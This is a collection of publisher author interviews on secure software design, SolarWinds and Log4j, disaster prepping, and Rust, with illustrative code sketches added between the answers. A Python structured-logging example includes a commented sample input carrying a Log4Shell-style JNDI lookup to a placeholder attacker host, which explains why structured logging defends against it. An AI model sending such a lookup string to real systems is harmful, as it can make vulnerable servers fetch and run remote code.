Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more facile at the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned for identifying these potential vulnerabilities.

 

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what actually happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, that are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks products foresee and how they are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures, and also ensure that it's the latest version available, before trusting any code, and of course promptly install future updates that fix critical issues.
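The install-time check Kohnfelder describes can be sketched as two independent gates: the cryptographic signature must verify, and the artifact must also be the current, non-revoked version. In this minimal sketch an HMAC stands in for a real public-key code signature (production systems use X.509 code-signing certificates), and the product name, key, and version feed are all hypothetical placeholders.

```python
# Sketch: a valid signature alone is not enough; also check freshness.
# HMAC stands in for an asymmetric code signature; key/feed are placeholders.
import hmac
import hashlib

SIGNING_KEY = b"demo-publisher-key"            # placeholder publisher key
LATEST_KNOWN_GOOD = {"exampled": "2024.2"}     # placeholder advisory/version feed

def sign(artifact: bytes) -> str:
    return hmac.new(SIGNING_KEY, artifact, hashlib.sha256).hexdigest()

def safe_to_install(name: str, version: str, artifact: bytes, sig: str) -> bool:
    valid = hmac.compare_digest(sign(artifact), sig)     # signature gate
    current = LATEST_KNOWN_GOOD.get(name) == version     # freshness/revocation gate
    return valid and current
```

A correctly signed but superseded build fails the second gate, which is exactly the case the paragraph above warns about: the signature stays valid even after the code is known to be unsafe.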

 

NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)

 

NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of just these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and APIs are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for APIs, which can fail to anticipate evolving threats and, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationship and security responsibility. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for the API documentation to provide clear security commitments, or detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—that they may not even have been aware of—offered attackers an attractive point of entry.

 

NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a perfect storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than the strings with escape sequences that got Log4j into trouble.

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of material (that would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that’d help. (I posted about Log4j at more length last year when it first became public.)
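The structured-data point Kohnfelder makes can be sketched briefly: if untrusted input is carried as a JSON field rather than interpolated into a message string, there is no message-parsing step in which a lookup sequence like Log4j's "${jndi:...}" could ever be interpreted. This is a minimal illustration of the idea, not the API from the book's Appendix A; the function name and fields are invented for the example.

```python
# Minimal structured-logging sketch: untrusted values travel as JSON data,
# never as part of an interpreted message string, so escape/lookup sequences
# stay inert text. Names and fields here are illustrative.
import json
import sys
from datetime import datetime, timezone

def log_event(event: str, **fields) -> str:
    record = {
        "ts": datetime.now(timezone.utc).isoformat(),
        "event": event,
        "data": fields,          # untrusted input lives here, as plain data
    }
    line = json.dumps(record)
    print(line, file=sys.stderr)
    return line

# An attacker-controlled value is just a string in the output:
# log_event("login_failed", user="${jndi:ldap://evil.example/a}")
```

The consumer of such logs parses JSON and reads fields; nothing ever re-interprets the attacker's string as an instruction.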

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.

 

The End Is (Not) Nigh: Disaster Prepping with Michal Zalewski


For our first Author Spotlight interview of 2022, we have illustrious guest Michal Zalewski—world-class security researcher and author of the newly released Practical Doomsday: A User’s Guide to the End of the World. In the following Q&A, we talk with him about taking disaster preparedness back from the fringe, what he's learned from living through numerous calamities, the reason hackers have the edge over doomsday preppers in any real emergency, and why he’s got a solid backup plan “if this whole computer thing turns out to be a passing fad.”

Practical Doomsday cover Michal Zalewski avatar

Michal Zalewski (aka lcamtuf) has been the VP of Security & Privacy Engineering at Snap Inc. since 2018, following an 11-year stint at Google, where he built the product security program and helped set up a seminal bug bounty initiative. Originally hailing from Poland, he kick-started his career with frequent BugTraq posts in the ’90s, and went on to identify and publish research on hundreds of notable security flaws in the browsers and software powering our modern internet. In addition to his influence on the tech industry, Zalewski's known as the developer of the American Fuzzy Lop open-source fuzzer and other tools. He's also the author of two classic security books via No Starch Press, The Tangled Web (2011) and Silence on the Wire (2005), and is a recipient of the prestigious Lifetime Achievement Pwnie Award.


NSP: Gratulacje on your new book, Michal! Suffice it to say, a practical prep guide for doomsday scenarios could not be more timely (...all things considered). You even joke on Twitter that the past few years were an elaborate viral marketing campaign for the book’s release. But in fact, you’ve been writing on this subject since at least 2015. What first lured you into the disaster-preparedness genre?

Michal Zalewski: I keep asking myself the same question! For one, I simply grew up at an interesting time and in an interesting place: in a failed Soviet satellite state going through a period of profound political and economic strife. As a child, I didn’t think of it much, but as an adult, I look at my early years with a degree of terror and awe.

I also have this geeky curiosity about how complex systems work and how they might fail—and to be frank, I can’t quite grasp why we look at this problem so differently in the physical world versus the digital realm. After all, it’s normal to back up our files or use antivirus software; why is it wacky to buy fire extinguishers for one’s home or store several gallons of water and some canned food?

In my mind, risk modeling and common-sense preparations shouldn’t be a political issue and shouldn’t be the domain of people who are convinced that the end is nigh. If anything, having a backup plan is a wonderful way to dispel some of the worries and anxieties of everyday life.
 

NSP: Your personal bio illustrates one of the key points in the book—that disasters are not rare. In addition to growing up in Poland in the '80s, the book also brings up the experience of living through 9/11, the dot-com crash, and the housing crisis of 2008. Would you explain that larger theme within the context of your own trials and tribulations?

MZ: Oh, I don’t want to oversell my life story! My experiences are shared by tens of millions of people around the globe. Countless others have lived through much worse—famine, devastating natural disasters, wars.

I’m going to say one thing, though. Living through a sufficient number of calamities reveals a simple truth: that every generation gets to experience their own “winter of the century,” “recession of the century,” “pandemic of the century,” and so on. And every time, such events catch them off guard.

In most cases, it’s not a matter of life and death; most people make it through recessions, wildfires, and floods. But having a robust plan can make the situation much less stressful, and can make the recovery more certain and more swift.
 

NSP: Most people picture doomsday preppers as ex-military survivalist-types—not a self-described “city-raised computer nerd.” How has your hacker background informed the emergency-preparedness thought process you’re teaching readers in the book?

MZ: If there’s one obvious difference, it’s that in the physical realm, life-threatening incidents are fairly rare. In the world of computing, on the other hand, networks and applications are under constant attack. When you work in this domain, I think you start to appreciate the saying attributed to Mike Tyson: “everyone has a plan until they get punched in the mouth”—that is, theory seldom survives the clash with reality. At the end of the day, the surest way to get through an emergency is to be adaptable and resilient, not to have an impressive stockpile of guns and bushcraft tools.

Another principle I picked up from the world of information security is that there is no limit to how much time, effort, and money you can spend in the pursuit of perfection—but perfection is not necessarily a useful goal. A good preparedness strategy needs to zero in on problems that are important, plausible, and can be addressed in a cost-effective way, without jeopardizing your quality of life should the apocalypse not come.
 

NSP: As a teenager, you became active in Europe’s fledgling infosec community, which led to consulting projects, pentesting gigs and, eventually, a remarkable career in the industry. Based on your own success, what do you think it takes to truly succeed in the infosec field and/or what’s your best career advice for aspiring security researchers?

MZ: I try to be careful with career advice—sometimes, people are successful despite their habits, not because of them. That said, I certainly found it helpful to always approach security in a bottom-up fashion. If you make the effort to understand how the underlying technologies really work, their failure modes become fairly self-evident too.

My best advice for aspiring professionals is different, though: perhaps the most underrated skill in tech is solid writing. That’s because technical prowess is not sufficient to succeed—you need to get others on board. I have a short Twitter thread with a handful of tips here.
 

NSP: In addition to your street cred in the security world, you’re credited with (inadvertently) helping hackerdom in another realm entirely—Hollywood. The Matrix Reloaded is lauded as the first major motion picture to accurately portray a hack. More specifically, your hack. For those who haven’t seen it, Trinity uses an Nmap port scan, followed by an SSH exploit to break into a power company and disable the city’s electric grid. In 2001, you discovered the SSH bug being depicted on screen. Can you tell us anything about your vulnerability report being in one of the movie’s most pivotal scenes?

MZ: I wish I had a cool story to tell! I was surprised (and flattered) to see my bug on the big screen. My other cinematic claim to fame is having my fuzzer—American Fuzzy Lop—surface in the TV series Mr. Robot.

Of course, my screen credits pale in comparison with the track record of the aforementioned Nmap tool. The network scanner makes an appearance in at least a dozen films and TV series, reportedly including at least one porn flick.
 

NSP: In an example of life imitating art, the intelligence community has recently sounded the alarm over an “unprecedented” uptick in hackers targeting electric grids. Maybe if the fictional power company in The Matrix Reloaded had someone like you working for them, Trinity’s blackout-inducing exploit would have failed—which begs the question: do you think white-hat hackers could be the answer to the risk that APTs pose to critical infrastructure? Is it as simple as utility providers adopting bug-bounty programs, such as the one your team launched at Google a decade ago?

MZ: Bug bounties are a cherry on top for a mature security program: they are a last-resort mechanism to catch a fraction of mistakes that slip past your internal defenses. But if you’re routinely letting vulnerabilities ship to production and then hoping that talented strangers will catch them all, you’re playing a very dangerous game.

A comprehensive security program starts with minimizing the risk of such mistakes in the first place: building automation that makes it easy to do the right thing and difficult for humans to mess up. The second layer of defense is internal processes for vetting the design and implementation of your systems, and for penetration-testing or fuzzing the products before they go out the door.

Still, the problem faced by most utilities isn’t related to any of this: it’s that we have a fairly small pool of infosec talent and that companies are fiercely competing for that talent. The Wyoming Rural Electric Association doesn’t have it easy when even the most junior security engineer can land an interview with Amazon, Goldman Sachs, or SpaceX.
 

NSP: From your early years posting software vulnerabilities on BugTraq, to your research exposing the flawed security models of web browsers, to helping Google build its massive product security program, you've become known as one of the most influential people in infosec. Over the same decades, the internet has gone from a place of dial-up connections and friendly message-boards to a global network that governs nearly every aspect of digital society. Given your unique vantage point in this regard, what do you think is the most pressing challenge in the industry today?

MZ: I'm not an infosec malcontent—I think our industry has made impressive progress when it comes to reasoning about and reducing the risk of most types of security flaws. But as you note, the stakes are getting higher too: nowadays, almost everything is connected to the internet, and even the humble thermostat on your wall might be running more than ten million lines of code. This makes absolute security a rather challenging goal.

In light of this, the two keywords that come to mind are "compartmentalization" and "containment." You have to plan for unavoidable mishaps and must have a way to prevent them from turning into disasters. For enterprises, this may involve dividing systems into smaller, well-understood blocks that can be cordoned off and monitored for anomalies with ease. The technologies and the architecture paradigms that make this possible are still in their infancy, but I think they hold a lot of promise.

Of course, we can practice compartmentalization and containment in everyday life, too. Perhaps only so much of your life should depend on the security of a single email provider or a single bank.
 

NSP: Last question! One of the prepper commandments in your book is, simply, “Learn new skills.” Why is this important for building a comprehensive disaster-preparedness plan, and what are some useful secondary skills that you have developed outside of infosec?

MZ: The point I make in the book is that the accelerating pace of technological change means that fewer and fewer jobs are for life. You know, in the 1990s, opening a VHS rental place or a music store was a sound business plan, journalism was a revered and well-paying gig, and the photographic film industry was a behemoth that consumed about a third of the global silver supply. We are probably going to see similar shifts in the coming decades. In particular, I’m not at all convinced that software engineering is still going to be an elite profession in 20-30 years.

It’s hard to predict the future, but it’s possible to hedge our bets—say, by pursuing potentially marketable hobbies on the side. Even if nothing happens, such pursuits are still rewarding on their own. I enjoy woodworking and tinkering with electronics. I could probably turn these hobbies into gainful employment if this whole computer thing turns out to be a passing fad.
 


*Use coupon code SPOTLIGHT30 to get 30% off your order of Practical Doomsday through March 9, 2022.
 

Live Coder Jon Gjengset Gets into the Nitty-Gritty of Rust


Our always fascinating Author Spotlight series continues with Jon Gjengset – author of Rust for Rustaceans. In the following Q&A, we talk with him about what it means to be an intermediate programmer (and when, exactly, you become a Rustacean), how Rust “gives you the hangover first” for your code's own good, why getting over a language's learning curve sure beats reactive development, and how new users can help move the needle toward a better Rust.

Rust for Rustaceans cover Jon Gjengset headshot

A former PhD student in the Parallel and Distributed Operating Systems group at MIT CSAIL, Gjengset is a senior software engineer at Amazon Web Services (AWS), with a background in distributed systems research, web development, system security, and computer networks. At Amazon, his focus is on driving adoption of Rust internally, including building out internal infrastructure as well as interacting with the Rust ecosystem and community. Outside of the 9-to-5, he conducts live coding sessions on YouTube, is working on research related to a new database engine written in Rust, and shares his open-source projects on GitHub and Twitter.


No Starch Press: Congratulations on your new book! Everyone digs the title, Rust for Rustaceans – which is a tad more fitting than its original moniker, Intermediate Rust. I only bring this up because both names speak to who the book is for. Let’s talk about that. What does “intermediate” mean to you in terms of using Rust? Specifically, what gap does your book fill for those who may have finished The Rust Programming Language, and are now raring to become *real* Rustaceans?

Jon Gjengset: Thank you! Yeah, I’m pretty happy with the title we went with, because as you’re getting at, the term “intermediate” is not exactly well-defined. In my mind, intermediate encapsulates all of the material that you wouldn’t need to know or feel comfortable digging into as a beginner to the language, but not so advanced that you’ll rarely run into it when you get to writing Rust code in the wild. Or, to phrase it differently, intermediate to me is the union of all the stuff that engineers working with Rust in real situations would pick up and find continuously useful after they’ve read The Rust Programming Language.

I also want to stress that the book is specifically not titled "The Path to Becoming a Rustacean," or anything along those lines. It’s not as though you’re not a real Rustacean until you’ve read this book, or that the knowledge the book contains is something every Rustacean knows. Quite the contrary – in my mind, you are a Rustacean from just before the first time you ask yourself whether you might be one, and it’s at that point you should consider picking up this book, whenever that may be. And for most people, I would imagine that point comes somewhere around two thirds through The Rust Programming Language, assuming you’re trying to actually use the language on the side.
 

NSP: Rust has been voted “the most loved language” on Stack Overflow for six years running. That said, it's also gained a reputation for being harder to learn than other popular languages. What do you tell developers who are competent in, say, Python but hesitant to try Rust because of the perceived learning curve?

JG: Rust is, without a doubt, a more difficult language to learn compared to its various siblings and cousins, especially if you’re coming from a different language that’s not as strict as Rust is. That said, I think it’s not so much Rust that’s hard to learn as it is the principles that Rust forces you to apply to your code. If you’re writing code in Python, to use your example, there are a whole host of problems the language lets you get away with not thinking about – that is, until they come back to bite you later. Whether that comes in the form of bugs due to dynamic typing, concurrency issues that only crop up during heavy load, or performance issues due to lack of careful memory management, you’re doing reactive development. You build something that kind of works first, and then go round and round fixing issues as you discover them.

Rust is different because it forces you to be more proactive. An apt quote from RustConf this year was that Rust “gives you the hangover first” – as a developer you’re forced to make explicit decisions about your program’s runtime behavior, and you’re forced to ensure that fairly large classes of bugs do not exist in your program, all before the compiler will accept your source code as valid. And that’s something developers need to learn, along with the associated skill of debugging at compile time as opposed to at runtime, as they do in other languages.

It’s that change to the development process that causes much of (though not all of) Rust’s steeper learning curve. And it’s a very real and non-trivial lesson to learn. I also suspect it’ll be a hugely valuable lesson going forward, with the industry’s increased focus on guaranteed correctness through things like formal verification, which only pushes the developer experience further in this direction. Not to mention that the lessons you pick up often translate back into other languages. When I now write code in Java, for instance, I am much more cognizant of the correctness and performance implications of that code because Rust has, in a sense, taught me how to reason better about those aspects of code.
 

NSP: In the initial 2015 release announcement, Rust creator Graydon Hoare called it “technology from the past come to save the future from itself.” More recently, Rust evangelist Carol Nichols described it as “trying to learn from the mistakes of C, and move the industry forward.” To give everyone some context for these sentiments, tell us what sets Rust apart safety-wise from “past” systems languages – in particular, C and C++ – when it comes to things like memory and ownership.

JG: I think Rust provides two main benefits over C and C++ in particular: ergonomics and safety. For ergonomics, Rust adopted a number of mechanisms traditionally associated with higher-level languages that make it easier to write concise, flexible, (mostly) easy-to-read, and hard-to-misuse code and interfaces – mechanisms like algebraic data types, pattern matching, fairly powerful generics, and first-class functions. These in turn make writing Rust feel less like what often comes to mind when we think about system programming – low-level code dealing just with raw pointers and bytes – and makes the language more approachable to more developers.

As for safety, Rust encodes more information about the semantics of code, access, and data in the type system, which allows it to be checked for correctness at compile-time. Properties like thread safety and exclusive mutability are enforced at the type-level in Rust, and the compiler simply won’t let you get them wrong. Rust’s strong type system also allows APIs to be designed to be misuse-resistant through typestate programming, which is very hard to pull off in less strict languages like C.
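The typestate idea can be sketched with a toy example (my own illustration, not from the interview; all names are hypothetical): by encoding a value's state in its type, operations that would be misuse simply don't exist, so the mistake is caught at compile time rather than at runtime.

```rust
use std::marker::PhantomData;

// Zero-sized marker types representing the connection's state.
struct Closed;
struct Open;

// The state lives in the type parameter, not in a runtime field.
struct Connection<State> {
    _state: PhantomData<State>,
}

impl Connection<Closed> {
    fn new() -> Self {
        Connection { _state: PhantomData }
    }

    // Opening consumes the closed connection and returns an open one,
    // so the old (closed) handle can no longer be used.
    fn open(self) -> Connection<Open> {
        Connection { _state: PhantomData }
    }
}

impl Connection<Open> {
    // read() exists only on an open connection; calling it on a
    // Connection<Closed> is a compile error, not a runtime check.
    fn read(&self) -> &'static str {
        "data"
    }
}

fn main() {
    let conn = Connection::new().open();
    println!("{}", conn.read());
    // Connection::new().read(); // would not compile: no `read` in the Closed state
}
```

The key design choice is that `open()` takes `self` by value, so the type system also prevents holding on to a stale pre-transition handle.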

Rust’s choice to have an explicit break-the-glass mechanism in the form of the unsafe keyword also makes a big difference, because it allows the majority of the language to be guaranteed-safe while also allowing low-level bits to stay within the same language. This avoids the trap of, say, performance-sensitive Python programs where you have to drop to C for low-level bits, meaning you now need to be an expert in two programming languages! Not to mention that unsafe code serves as a natural audit trail for security reviews!
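As a minimal illustration of that audit-trail point (again my own sketch, not from the interview), a safe function can confine one clearly justified `unsafe` block behind an API that callers cannot misuse; a reviewer only needs to check the `SAFETY` comment, not every call site:

```rust
// Returns the first byte of a slice, or None if the slice is empty.
// The unsafe block is the single audit point for this function.
fn first_byte(bytes: &[u8]) -> Option<u8> {
    if bytes.is_empty() {
        None
    } else {
        // SAFETY: we just checked that the slice is non-empty,
        // so index 0 is guaranteed to be in bounds.
        Some(unsafe { *bytes.get_unchecked(0) })
    }
}

fn main() {
    assert_eq!(first_byte(b"hello"), Some(b'h'));
    assert_eq!(first_byte(b""), None);
    println!("ok");
}
```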
 

NSP: Along those same lines, Rust (like Go and Java) prevents programmers from introducing a variety of memory bugs into their code. This got the attention of the Internet Security Research Group, whose latest project, Prossimo, is endeavoring to replace basic internet programs written in C with memory-safe versions in Rust. Microsoft has also been very vocal about their adoption of Rust, and Google is backing a project bringing Rust to the Linux kernel underlying Android. As Rust is increasingly embraced and used for bigger and bigger projects, are there any niche or large-scale applications, or certain technology combos you’re most excited about?

JG: Putting aside the discussion about whether Rust prevents the same kinds of bugs in the same kinds of ways as languages like Go and Java, it’s definitely true that the move to these languages represents a significant boost to memory safety. And I think Rust in particular unlocked another segment of applications that would previously have been hard to port, such as those that would struggle to operate with a language runtime or automated garbage collection.

For me, some of the most exciting trajectories for Rust lie in its interoperability with other systems and languages, such as making Rust run on the web platform through WASM, providing a better performance fallback for dynamic languages like Ruby or Python, and allowing component-by-component rewrites in established existing systems like cURL, Firefox, and Tor. The potential for adoption of Rust in the kernel is also very much up there if it might make kernel development more approachable than it currently is – kernel C programming can be very scary indeed, which means fewer contributors dare try.
 

NSP: In the book’s foreword, David Tolnay – a prolific contributor to the language, who served as your technical reviewer – says that he wants readers to “be free to think that we got something wrong in this book; that the best current guidance in here is missing something, and that you can accomplish something over the next couple years that is better than what anybody else has envisioned. That’s how Rust and its ecosystem have gotten to this point.” The community-driven development process he’s referencing is somewhat unique to Rust and its evolution. Could you briefly explain how that works?

JG: I’m very happy that David included that in his foreword, because it resonates strongly with me coming from a background in academia. The way we make progress is by constantly seeking to find new and better solutions, and questioning preconceived notions of what is and isn’t possible, or how things “should” be done. And I think that’s part of how Rust has managed to address as many pain points as it does. The well-known Rust adage of “fast, reliable, productive, pick three” is, in some sense, an embodiment of this sentiment – let’s not accept the traditional wisdom that this is a fundamental trade-off, and instead put in a lot of work and see if there’s a better way.

In terms of how it works in practice, my take is that you should always seek to understand why things are the way they are. Why is this API structured this way? Why doesn’t this type implement Send? Why is static required here? Why does the standard library not include random number generation? Often you’ll find that there is a solid and perhaps fundamental underlying reason, but other times you may just end up with more questions. You might find an argument that seems squishy and soft, and as you start poking at it you realize that maybe it isn’t true anymore. Maybe the technology has improved. Maybe new algorithms have been developed. Maybe it was based on a faulty assumption to begin with. Whatever it may be, the idea is to keep pulling at those threads in the hope that at the other end lies some insight that allows you to make something better.

The end result could be an objectively better replacement for some hallmark crate in the ecosystem, an easing of restrictions in the type system, or a change to the recommended way to write code – all of which move the needle along towards a better Rust. That sentiment's best summarized by David Tolnay’s self-quote from 2016: “This language seems neat but it's too bad all the worthwhile libraries are already being built by somebody else.”
 

NSP: Alumni of the Rust Core team have said that it’s a systems language designed for the next 40 years – quite an appealing hook for businesses and organizations that want their fundamental code base to be usable well into the future. What are some of the key design decisions that have made Rust, in effect, built to last?

JG: Rust takes backwards compatibility across versions of the compiler very seriously, and the intent is that (correct) code that compiled with an older version of the compiler should continue to compile indefinitely. To ensure this, larger changes to the language are tested by re-building all versions of all crates published to crates.io to check that there are no regressions. Of course, the flip side of backwards compatibility is that it can be difficult to make improvements to the language, especially around default behavior.

The Rust project’s idea to bridge this divide is the “edition” system. At its core, the idea is to periodically cut new Rust editions that crates can opt into to take advantage of the latest non-backwards-compatible improvements, but with the promise that crates using different editions can co-exist and interoperate, and that old editions will continue to be supported indefinitely. This necessarily limits what changes can be made through editions, but so far it has proven to be a good balance between “don’t break old stuff” and “enable development of new stuff” that is so vital to a language’s long-term health.

The Rust community’s commitment to semantic versioning also underpins some of Rust’s long-term stability promises – that is, by allowing crates to declare through their version number when they make breaking changes, Rust can ensure that even as dependencies change, their dependents will continue to build long into the future (though potentially losing out on improvements and bug fixes as old versions stop being maintained).
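Both mechanisms surface directly in a crate's manifest. A hypothetical Cargo.toml fragment (crate name and dependency chosen purely for illustration) might look like this:

```toml
[package]
name = "example-crate"   # placeholder name
version = "0.1.0"
edition = "2021"         # opt in to the 2021 edition's changes

[dependencies]
# Semver "caret" requirement: Cargo may select any compatible
# release >= 1.0.0 and < 2.0.0, so bug fixes arrive automatically
# while breaking changes (2.x) are held back.
serde = "1.0"
```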
 

NSP: One of the goals listed on the Rust 2018 roadmap was to develop teaching resources for intermediate Rustaceans, which I believe is what spurred you to start streaming your live-coding sessions on YouTube. Developers have really embraced them as a way of learning how to use Rust “for real.” Why is it useful, in your view, for newcomers to see an experienced Rust programmer go through the whole development process and see real systems implemented in real time?

JG: Learning a language on your own is a daunting task that requires self-motivation and perseverance. You need to find a problem you’re interested in solving; you need to find the will to get through the initial learning curve where you’ll get stuck more often than you’ll make meaningful progress; and you have to accept the inevitable rabbit holes that you’ll go down when it turns out things don’t work the way you thought they did. That’s not an insurmountable challenge, and some people really enjoy the journey, but it is also time-consuming, humbling and, at times, quite frustrating. Especially because it can feel like you’re infinitely far from what you really wanted to build.

Watching experienced developers build something, especially if you’re watching live and can ask questions, provides a shortcut of sorts. You get to be directly exposed to good development and debugging processes; you get exposure to language mechanisms and tools that you may otherwise not have found for a while on your own; and you spend less time stuck searching for answers, since the experienced developer can probably explain why something doesn’t work shortly after discovering the problem. Of course, it’s not a complete replacement. You don’t get as much of a say in what problem is being worked on, which means you may not be as invested in it, and you won’t get the same exposure to teaching resources that you may later need as you’re trying to work things out on your own. Ultimately, I think of it as a worthwhile “experience booster” to supplement a healthy and steady diet of writing code yourself.
 

NSP: The popularity of your videos notwithstanding, you’ve said that part of what inspired you to write the book is that “they’re not for everyone,” and that some people – yourself included – have a different learning style. Given both mediums cover advanced topics (pinning, async, variance, and so on), would you say the book is an alternative to the live coding sessions, or is it designed to complement them? In other words, would a developer who’s watched your videos still benefit from the book (and vice versa)?

JG: It’s a bit of a mix. The "Crust of Rust" videos cover topics that also appear in the book, and the book covers topics from my videos, but often in fairly different ways. I think it’s likely that consuming both still leads to a deeper understanding than consuming either in isolation. But I also think that consuming either of them should be enough to at least give you the working knowledge you need to start playing with a given Rust feature yourself.

For readers of the book, I would actually recommend watching one of the longer live-coding streams on my channel (over the Crust videos), because they cover a lot of ground that’s hard to capture in a book. Topics like how to think about an error message, or how to navigate Rust documentation work best when demonstrated in practice. And who knows – you may even find the problem area interesting enough that you watch the whole thing to the end!

And with that… std::process::exit
 

Cracking Cybercrimes with Threat Analyst Jon DiMaggio


Our illuminating Author Spotlight series continues this month with Jon DiMaggio – author of The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime (March 2022). In the following Q&A, we talk with him about the difference between traditional threats and nation-state attacks, the reasons that critical infrastructure is an easy target for threat actors, the emerging "magic formula" for defeating ransomware, and the fact that just because you're paranoid doesn't mean they aren't targeting you on social media.

Art of Cyberwarfare cover Jon DiMaggio headshot

DiMaggio is a recognized industry veteran in the business of “chasing bad guys,” with over 15 years of experience as a threat analyst. Currently he serves as chief security strategist at Analyst1, and his research on Advanced Persistent Threats (APTs) has identified enough new tactics, techniques, and procedures (TTPs) to garner him near-celebrity status in the cyber world. A fixture on the speaker circuit and at conferences, including RSA (and this month’s CYBERWARCON), DiMaggio has also been featured on Fox, CNN, Bloomberg, Reuters TV, and in publications such as WIRED, Vice, and Dark Reading. He continues to write professional blog posts, intel reports, and white papers on his research into cyber espionage and targeted attacks – insights that have been cited by law enforcement and used in nation-state indictments.


No Starch Press: You’re known as one of the first intelligence analysts to focus on attacks executed by nation-state hacking groups – referred to as Advanced Persistent Threats. What’s the difference between traditional cyberattacks and APTs?

